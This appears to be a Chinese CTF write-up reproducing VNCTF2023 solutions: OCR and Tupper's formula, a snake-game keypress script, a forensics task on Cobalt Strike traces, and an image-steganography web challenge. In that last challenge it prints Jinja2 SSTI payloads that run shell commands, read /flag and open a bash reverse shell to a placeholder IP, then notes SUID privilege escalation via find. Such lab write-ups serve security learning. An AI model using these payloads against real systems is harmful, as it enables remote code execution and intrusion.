复现:VNCTF2023
验证码
hint:Tupper(塔珀自指公式)
给了一堆图片,组合起来应该就是Tupper公式中的k
利用python的OCR批量识别,我找到了两个库进行识别对比
import pytesseract from PIL import Image from numpy.core.defchararray import isdigit for i in range(136): path = str(i) + '.png' text = pytesseract.image_to_string(Image.open(path)).replace('o', '0') print("".join(list(filter(isdigit, text))), end='') #这个库识别错了好多,效率比较慢
import ddddocr ocr = ddddocr.DdddOcr() for i in range(0,136): with open('{}.png'.format(i), 'rb') as f: img_bytes = f.read() tmp = ocr.classification(img_bytes).replace('o','0') print("".join(list(tmp)), end='') #这个库只错了一个,效率也很高
找个tupper脚本,直接跑
import numpy as np import matplotlib.pyplot as plt def Tupper_self_referential_formula(k): aa = np.zeros((17, 106)) def f(x, y): y += k a1 = 2 ** -(-17 * x - y % 17) a2 = (y // 17) // a1 return 1 if a2 % 2 > 0.5 else 0 for y in range(17): for x in range(106): aa[y, x] = f(x, y) return aa[:, ::-1] k = 1594199391770250354455183081054802631580554590456781276981302978243348088576774816981145460077422136047780972200375212293357383685099969525103172039042888918139627966684645793042724447954308373948403404873262837470923601139156304668538304057819343713500158029312192443296076902692735780417298059011568971988619463802818660736654049870484193411780158317168232187100668526865378478661078082009408188033574841574337151898932291631715135266804518790328831268881702387643369637508117317249879868707531954723945940226278368605203277838681081840279552 aa = Tupper_self_referential_formula(k) plt.figure(figsize=(15, 10)) plt.imshow(aa, origin='lower') plt.gca().invert_xaxis()#x轴反方向反转 plt.show()
Snake on web
wasm逆向题
但可以用按键脚本跑
from pynput import keyboard import time control = keyboard.Controller() while True: # 蛇头朝向右边,起点随便 time.sleep(3) control.press('s') control.release('s') time.sleep(0.05) control.press('a') control.release('a') time.sleep(3) control.press('s') control.release('s') time.sleep(0.05) control.press('d') control.release('d')
跑到100分就有flag
LSSTIB
打开靶机是用来上传png的,根据题目猜测是利用png的lsb解密后执行ssti
制作lsb的脚本
# -*- coding: utf-8 -*- """ Created on Sun May 19 11:20:05 2019 @author: Administrator """ from PIL import Image def plus(string): # Python zfill() 方法返回指定长度的字符串,原字符串右对齐,前面填充0。 return string.zfill(8) def get_key(strr): # 获取要隐藏的文件内容 with open(strr, "rb") as f: s = f.read() string = "" for i in range(len(s)): # 逐个字节将要隐藏的文件内容转换为二进制,并拼接起来 # 1.先用ord()函数将s的内容逐个转换为ascii码 # 2.使用bin()函数将十进制的ascii码转换为二进制 # 3.由于bin()函数转换二进制后,二进制字符串的前面会有"0b"来表示这个字符串是二进制形式,所以用replace()替换为空 # 4.又由于ascii码转换二进制后是七位,而正常情况下每个字符由8位二进制组成,所以使用自定义函数plus将其填充为8位 string = string+""+plus(bin(s[i]).replace('0b', '')) # print(string) return string def mod(x, y): return x % y # str1为载体图片路径,str2为隐写文件,str3为加密图片保存的路径 def func(str1, str2, str3): im = Image.open(str1) # 获取图片的宽和高 width, height = im.size[0], im.size[1] print("width:"+str(width)) print("height:"+str(height)) count = 0 # 获取需要隐藏的信息 key = get_key(str2) keylen = len(key) for h in range(height): for w in range(width): pixel = im.getpixel((w, h)) a = pixel[0] b = pixel[1] c = pixel[2] if count == keylen: break # 下面的操作是将信息隐藏进去 # 分别将每个像素点的RGB值余2,这样可以去掉最低位的值 # 再从需要隐藏的信息中取出一位,转换为整型 # 两值相加,就把信息隐藏起来了 a = a-mod(a, 2)+int(key[count]) count += 1 if count == keylen: im.putpixel((w, h), (a, b, c)) break b = b-mod(b, 2)+int(key[count]) count += 1 if count == keylen: im.putpixel((w, h), (a, b, c)) break c = c-mod(c, 2)+int(key[count]) count += 1 if count == keylen: im.putpixel((w, h), (a, b, c)) break if count % 3 == 0: im.putpixel((w, h), (a, b, c)) im.save(str3) def main(): # 原图 old = "flag.png" # 处理后输出的图片路径 new = "flag_encode.png" # 需要隐藏的信息 enc = "a.txt" func(old, enc, new) if __name__ == '__main__': main()
先做一张空白的png
from PIL import Image x = y = 100 img = Image.new("RGB",(x,y)) for width in range(0,x): for height in range(0,y): img.putpixel((width,height),(255,255,255)) img.save('flag.png')
在a.txt写payload,运行脚本上传
{{ config.__class__.__init__.__globals__['os'].popen('ls /').read() }}
查看flag
{{ config.__class__.__init__.__globals__['os'].popen('cat /flag').read() }}
反弹shell
{{config.__class__.__init__.__globals__['os'].popen('bash -c "bash -i >& /dev/tcp/xx.xxx.xxx.xxx/2333 0>&1"').read()}}
当前是普通用户
进行suid提权,先找有suid权限的二进制可执行文件
find有suid权限,新建一个文件夹
利用find提权
获取flag
来一把紧张刺激的CS
根据poc.py,需要找到异常进程名字,连接端口,地址,公钥
先用vol3分析一下,可知是win10镜像
根据题目提示可以利用cobaltstrike插件(插件地址:https://github.com/Immersive-Labs-Sec/volatility_plugins)
把数据放入脚本,跑出flag
import hashlib welocome = """ Welcome to VNCTF 2023 Try your best to find the traces left by that man! Note: Just fill in the information you find in the variables below, and be careful not to bring extra spaces at the beginning and end. """ process_name: str = "dllhost.exe" # name of the doubtable process port: str = "8347" # port of the connection server_address: str = "20-2-3.c-t-f.v-n-tea-m.ltd" # address of the remote server,just like a url publickey: str = "b'0\x81\x9f0\r\x06\t*\x86H\x86\xf7\r\x01\x01\x01\x05\x00\x03\x81\x8d\x000\x81\x89\x02\x81\x81\x00\xaf(Z\xfb\x11\x1cH\xb0\xaf%\xa2\n\xe1\\\xd8\xb2,\xf61\xa4\xdf\xd1\x8c\x13\xb7\x19@3\xd9I\xef\xea)8D\xf7\x8c\xa8\x16\xcb\xbe\xe0\xe2{s\xbd.\x1f\x19\xdc\xf6Hp\xd7\xa3\x86t\xf8x%\x97\x12\xed\xa8\xeb\x98\xf4\x0e\xfe\xc7\xb3\x95 \xcf_\x9e\xf4\xc5V\xff\x97\x8dc2\xa3\xfe\x82\xd1\xc3\xcb\x1d\xf5\x9eG}\xf8\x16\xf8\x82\xf7X\xe0\xc0\xb9\xff\x19\xc5\x97\x0cX\xec\x12a \xb8\xf9`=\xe4\xb6#\xcc\x93:\x1a3\xad\xa5\x02\x03\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'" # A string of hexadecimal,without "0x",in lowercase hash_ans: str = hashlib.md5((process_name + port + server_address + publickey).encode()).hexdigest() print("Your answer is: flag{" + hash_ans + "}")
Your answer is: flag{fca568a71cd9b0fd89980863d2212f2f}